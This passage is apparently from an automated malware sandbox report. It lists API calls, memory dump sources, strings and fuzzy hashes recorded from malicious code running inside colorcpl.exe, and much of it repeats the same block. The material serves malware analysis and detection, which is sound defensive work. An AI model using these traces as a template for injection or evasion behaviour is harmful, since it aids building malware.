                                                                                                        • Associated: 00000007.00000002.4158216679.000000000534D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5220000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: c78edab4fb6c333d0e65a8d9d9e419c7af476ca36e7b28c668e27b089d3ebf8e
                                                                                                        • Instruction ID: 7fafe30f986b974291198c25a0e44a806a27d40bc695f87fa4b10d99d14ffa36
                                                                                                        • Opcode Fuzzy Hash: c78edab4fb6c333d0e65a8d9d9e419c7af476ca36e7b28c668e27b089d3ebf8e
                                                                                                        • Instruction Fuzzy Hash: FF900263B1140043414071A888849064015AFE1311795C121A1998550E859989655665
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.4158216679.0000000005349000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000007.00000002.4158216679.000000000534D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5220000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.4158216679.0000000005349000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000007.00000002.4158216679.000000000534D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5220000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.4158216679.0000000005349000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000007.00000002.4158216679.000000000534D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5220000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.4158216679.0000000005349000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000007.00000002.4158216679.000000000534D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5220000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.4158216679.0000000005349000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000007.00000002.4158216679.000000000534D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5220000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.4158216679.0000000005349000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000007.00000002.4158216679.000000000534D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5220000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.4158216679.0000000005349000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000007.00000002.4158216679.000000000534D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5220000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.4158216679.0000000005349000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000007.00000002.4158216679.000000000534D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5220000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.4158216679.0000000005349000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000007.00000002.4158216679.000000000534D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5220000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.4158216679.0000000005349000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000007.00000002.4158216679.000000000534D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5220000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.4158216679.0000000005349000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000007.00000002.4158216679.000000000534D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5220000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 535 32238c0-3223908 call 322b270 538 3223a14-3223a1a 535->538 539 322390e-3223988 call 322b350 call 32142f0 call 3201410 call 3221a10 535->539 548 3223990-32239a4 Sleep 539->548 549 32239a6-32239b8 548->549 550 3223a05-3223a0c 548->550 551 32239da-32239f3 call 3225e30 549->551 552 32239ba-32239d8 call 3225d90 549->552 550->548 553 3223a0e 550->553 557 32239f8-32239fb 551->557 552->557 553->538 557->550
                                                                                                        APIs
                                                                                                        • Sleep.KERNELBASE(000007D0), ref: 0322399B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4157215584.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_3200000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Sleep
                                                                                                        • String ID: net.dll$wininet.dll$+
                                                                                                        • API String ID: 3472027048-3751960166
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4157215584.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_3200000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeUninitialize
                                                                                                        • String ID: @J7<
                                                                                                        • API String ID: 3442037557-2016760708
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4157215584.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_3200000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeUninitialize
                                                                                                        • String ID: @J7<
                                                                                                        • API String ID: 3442037557-2016760708
                                                                                                        • Opcode ID: 8d9c8f800baec38cd15c166777e743d3820f676bbc6c5c58a286655719c12787
                                                                                                        • Instruction ID: fa1f46afb6a0c8846316d537e02843d1ef5e7f69f68a4725e4b980f2d76c7240
                                                                                                        • Opcode Fuzzy Hash: 8d9c8f800baec38cd15c166777e743d3820f676bbc6c5c58a286655719c12787
                                                                                                        • Instruction Fuzzy Hash: 023154B6A1060AAFDB00DFD8CD809EFB7B9FF48304B148559E515EB204D771EE458BA0
                                                                                                        APIs
                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 03214362
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4157215584.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_3200000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Load
                                                                                                        • String ID:
                                                                                                        • API String ID: 2234796835-0
                                                                                                        • Opcode ID: cabadc429ca9bf0ea4f6f112ad196f5047ef34b7e91932448bc3641e5bf786ad
                                                                                                        • Instruction ID: 240eaf43a681d6786310cae3ca0650a6b29ef2a2217f24bcb18c65183559711d
                                                                                                        • Opcode Fuzzy Hash: cabadc429ca9bf0ea4f6f112ad196f5047ef34b7e91932448bc3641e5bf786ad
                                                                                                        • Instruction Fuzzy Hash: 01015EB9D1020EBBDB10EAA1DD41FAEB7B89B54308F144194EA089B241F670E758CB91
                                                                                                        APIs
                                                                                                        • CreateProcessInternalW.KERNELBASE(?,?,?,?,032180BE,00000010,?,?,?,00000044,?,00000010,032180BE,?,?,?), ref: 03229630
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4157215584.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_3200000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateInternalProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 2186235152-0
                                                                                                        • Opcode ID: 5e95764a33c8cb1fca4e2c6aa4495904ddcd1e1733e80192e71f584631693ad5
                                                                                                        • Instruction ID: 38603589bbdee43a23cf97014ee4fd0e405e097d1429fe4cb39cfdaa65efd93c
                                                                                                        • Opcode Fuzzy Hash: 5e95764a33c8cb1fca4e2c6aa4495904ddcd1e1733e80192e71f584631693ad5
                                                                                                        • Instruction Fuzzy Hash: C901C0B6214608BBCB04DE89DC80EDB77ADEF8C714F408208BA19E7280D630F851CBA4
                                                                                                        APIs
                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 03214362
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4157215584.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_3200000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Load
                                                                                                        • String ID:
                                                                                                        • API String ID: 2234796835-0
                                                                                                        • Opcode ID: 423c684e834905f389e317ff0e0b23f2fa40fc56bd2a3155af97fab3e49be924
                                                                                                        • Instruction ID: 6ee08727176e406b0d6c1c24c3c37bf7bc8a7ea6901039035798412f68a25d76
                                                                                                        • Opcode Fuzzy Hash: 423c684e834905f389e317ff0e0b23f2fa40fc56bd2a3155af97fab3e49be924
                                                                                                        • Instruction Fuzzy Hash: 42F0C27591020AAADF10EBA1DC81F9DB7B8AF14708F584294D8089A141E631E794C791
                                                                                                        APIs
                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 03214362
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4157215584.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_3200000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Load
                                                                                                        • String ID:
                                                                                                        • API String ID: 2234796835-0
                                                                                                        • Opcode ID: b7da9ea4713e95006062604f2f78b917355cdf7c45eb40070df55e5d5004b345
                                                                                                        • Instruction ID: ee5dc1712e026049c394e302f00f05204d2d1a87f5974b202cab688ea39c115a
                                                                                                        • Opcode Fuzzy Hash: b7da9ea4713e95006062604f2f78b917355cdf7c45eb40070df55e5d5004b345
                                                                                                        • Instruction Fuzzy Hash: 45F09E296A9B086BC3119BBA99057C9B7E4FF42900F284198DDC9C6A53E363821AC791
                                                                                                        APIs
                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 03209DA5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4157215584.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_3200000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 2422867632-0
                                                                                                        • Opcode ID: d9e4531af00abc86503a29f7e8558993c3ae072f053631ad95bb8966d6e57d91
                                                                                                        • Instruction ID: a1612d1923ce4016d423ec2919fb0caf624ccd989053c8db7987683e2bddcd5e
                                                                                                        • Opcode Fuzzy Hash: d9e4531af00abc86503a29f7e8558993c3ae072f053631ad95bb8966d6e57d91
                                                                                                        • Instruction Fuzzy Hash: 63F06D773A431436E720A1A9AC02FDBB79CCB80B61F240425FA0DEB1C1D9E5B89146A5
                                                                                                        APIs
                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 03209DA5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4157215584.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_3200000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 2422867632-0
                                                                                                        • Opcode ID: 964b0e4da47c8700d6a9d11219176d5b81c11e1b76ac7b25ac9e0a4425ec12f7
                                                                                                        • Instruction ID: 8d0b23c57e29606e948b982564611057464a0425099685291926243b79536826
                                                                                                        • Opcode Fuzzy Hash: 964b0e4da47c8700d6a9d11219176d5b81c11e1b76ac7b25ac9e0a4425ec12f7
                                                                                                        • Instruction Fuzzy Hash: ACF0927769471036E330A1989C02FDB6798CB80B51F240115FA0DFF2D1D9E9B99146A5
                                                                                                        APIs
                                                                                                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,9403D333,00000007,00000000,00000004,00000000,03213BD5,000000F4), ref: 0322957C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4157215584.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_3200000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FreeHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 3298025750-0
                                                                                                        • Opcode ID: 27bbdd54da5c965e61241d10b6020c612638fb223b0637cadf89fda0c63e04a5
                                                                                                        • Instruction ID: f4bb1977f33f988ada6f6f1b90ffa6a136b4a315f70bb6f026fdca58cd6645e2
                                                                                                        • Opcode Fuzzy Hash: 27bbdd54da5c965e61241d10b6020c612638fb223b0637cadf89fda0c63e04a5
                                                                                                        • Instruction Fuzzy Hash: 52E06DB56002047FD610EE59DC41E9B37ADDFC5710F004009F908AB241D671B820C6B5
                                                                                                        APIs
                                                                                                        • RtlAllocateHeap.NTDLL(03211832,?,?,03211832,032254CF,?,?,03211832,032254CF,00001000), ref: 0322952F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4157215584.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_3200000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocateHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 1279760036-0
                                                                                                        • Opcode ID: 8e8f804e6e2566f97d4133197ec8a822201c655ac3a2fa4d2fbee59e578fcff7
                                                                                                        • Instruction ID: d892d170e1fedc9bac8eb0e05f43bece48374e9ffdaa4daf483151b7dd624365
                                                                                                        • Opcode Fuzzy Hash: 8e8f804e6e2566f97d4133197ec8a822201c655ac3a2fa4d2fbee59e578fcff7
                                                                                                        • Instruction Fuzzy Hash: DBE065B6200308BFD610EE59DC45F9B77ACEFC9724F404009F908AB281D670B9208AB5
                                                                                                        APIs
                                                                                                        • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 0321812C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4157215584.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_3200000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AttributesFile
                                                                                                        • String ID:
                                                                                                        • API String ID: 3188754299-0
                                                                                                        • Opcode ID: 4f6617fd5a62fc4568d9e6c02f66cfbc60d0166b2f88d4bd3319c6be46831a9b
                                                                                                        • Instruction ID: b0b2aca9cfd9c4f497382bb25017ad11d1a4bb1228a61ad91c8d1bfff84e5ec2
                                                                                                        • Opcode Fuzzy Hash: 4f6617fd5a62fc4568d9e6c02f66cfbc60d0166b2f88d4bd3319c6be46831a9b
                                                                                                        • Instruction Fuzzy Hash: 25E0203215030427EF60D5A8DD85F6333889744A74F4C4650FC1CDB6C1D578F4914250
                                                                                                        APIs
                                                                                                        • SetErrorMode.KERNELBASE(00008003,?,?,03211B30,03227E0E,032254CF,?), ref: 03217F23
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4157215584.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_3200000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorMode
                                                                                                        • String ID:
                                                                                                        • API String ID: 2340568224-0
                                                                                                        • Opcode ID: 18bff222efdca047364ccdda0dae273c7697e574fba03accafcb5418ebc76b94
                                                                                                        • Instruction ID: e53cf6236fcb8a4fc38ebb70257f5dd2b48e8039cf917ea49191be2f70101fdb
                                                                                                        • Opcode Fuzzy Hash: 18bff222efdca047364ccdda0dae273c7697e574fba03accafcb5418ebc76b94
                                                                                                        • Instruction Fuzzy Hash: 12D05E756A83053BF740E6E58C06F5636CC9B58654F154464FA1CFB2C2ECA9F0A04AA5
                                                                                                        APIs
                                                                                                        • PostThreadMessageW.USER32(?,00000111), ref: 03210C17
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4157215584.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_3200000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessagePostThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 1836367815-0
                                                                                                        • Opcode ID: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                                                        • Instruction ID: 3f16da0c822a7fd032e07549b147e5896790661852d238974be12998015ffd48
                                                                                                        • Opcode Fuzzy Hash: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                                                        • Instruction Fuzzy Hash: ADD0237770000C36E60145C46CC1CFFF75CDB88AA5F004063FF08D1040E5214D020BB0
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4157215584.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_3200000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseFind
                                                                                                        • String ID:
                                                                                                        • API String ID: 1863332320-0
                                                                                                        • Opcode ID: 5280d22c022ed015ef66db8bda8d322a9f357da5a1d3dc6d9774782934470552
                                                                                                        • Instruction ID: 7599cc5a7cd133e9d2694361c7c502c1025bf4f4f1af5b2f7e48197fd07e271f
                                                                                                        • Opcode Fuzzy Hash: 5280d22c022ed015ef66db8bda8d322a9f357da5a1d3dc6d9774782934470552
                                                                                                        • Instruction Fuzzy Hash: 89C09B3B76612C4B47015DF5B8C74EDB7A0E795236B2015FAD509C6450E663045646C1
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.4158216679.0000000005349000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000007.00000002.4158216679.000000000534D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5220000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 52a171d69c60f0daf170f36b96317d3f5bd73d4324a4433f5f89ecd1d0b16678
                                                                                                        • Instruction ID: 115a70ea7010094f31c12b5448f59e075fe71dfd93287ebca0f0c67de412edd1
                                                                                                        • Opcode Fuzzy Hash: 52a171d69c60f0daf170f36b96317d3f5bd73d4324a4433f5f89ecd1d0b16678
                                                                                                        • Instruction Fuzzy Hash: 44B09B73D115D5D6DE15E7604608B1779117FD0701F56C061D3070651F4778D1D1E1B5
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4158168092.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5140000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                                        • API String ID: 0-3558027158
                                                                                                        • Opcode ID: 9f04e1dc506f42f0de9fd4ca82da11d9677e0e2421fe9a9fa01c9eac5faa3e7b
                                                                                                        • Instruction ID: 1481e68642b23343ffa220f4dcba5c108b6b1d60fd58bd785fc8cf4d972d62da
                                                                                                        • Opcode Fuzzy Hash: 9f04e1dc506f42f0de9fd4ca82da11d9677e0e2421fe9a9fa01c9eac5faa3e7b
                                                                                                        • Instruction Fuzzy Hash: 3E915EF04482988AC7158F54A0652AFFFB5EBC6305F15816DE7E6BB243C3BE89058F85
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.4158216679.0000000005349000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000007.00000002.4158216679.000000000534D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5220000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ___swprintf_l
                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                        • API String ID: 48624451-2108815105
                                                                                                        • Opcode ID: aa69cdf2d60a3fda130659a70fb336be9f31f0cbfbbca6d7d1dd7049367c1b92
                                                                                                        • Instruction ID: 37848106ee8fd92345f9e08950619f2130c28ac5919ef8f9eb6176de056b1d74
                                                                                                        • Opcode Fuzzy Hash: aa69cdf2d60a3fda130659a70fb336be9f31f0cbfbbca6d7d1dd7049367c1b92
                                                                                                        • Instruction Fuzzy Hash: AF51C5BAA24117BBDF24DB98889097EFBB9BF08240B50C669E499D7741D374DE4087E0
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.4158216679.0000000005349000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000007.00000002.4158216679.000000000534D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5220000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ___swprintf_l
                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                        • API String ID: 48624451-2108815105
                                                                                                        • Opcode ID: 524a4cc9d017a482e392474aed3d51c5eb61382361212565f647ce13c9b8d914
                                                                                                        • Instruction ID: d774695881216bd9c8a2017ecf2d0f92427712c6ffbd94ee650a21789c42c783
